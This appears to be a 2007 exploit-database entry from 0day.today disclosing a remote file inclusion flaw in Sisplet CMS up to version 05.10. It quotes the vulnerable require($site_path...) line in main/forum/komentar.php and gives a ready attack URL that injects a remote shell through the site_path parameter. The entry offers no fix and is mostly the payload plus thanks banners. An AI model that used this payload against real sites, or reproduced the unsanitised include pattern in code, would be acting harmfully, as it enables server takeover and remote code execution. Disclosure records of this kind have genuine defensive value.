Sisplet CMS <= 05.10 (site_path) Remote File Inclusion Vulnerability

2007-04-05T00:00:00
ID 1337DAY-ID-1708
Type zdt
Reporter kezzap66345
Modified 2007-04-05T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Sisplet CMS <= 05.10 (site_path) Remote File Inclusion Vulnerability
====================================================================



Sisplet CMS
*****************
Found by kezzap66345 *
*****************


*****************
*****************
ERROR#1:
File:main/forum/komentar.php
*****************


require($site_path.'main/forum/class.php');     <<< rfi coded


**************************************************************************************
RFI#1:

http://SITE.com/path/main/forum/komentar.php?site_path=[SHELL]


**************************************************************************************
**************************************************************************************
Thanks:Siircicocuk and x0r0n
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
******Thanx****SiiRCiCOCUK************************************************************




#  0day.today [2018-04-13]  #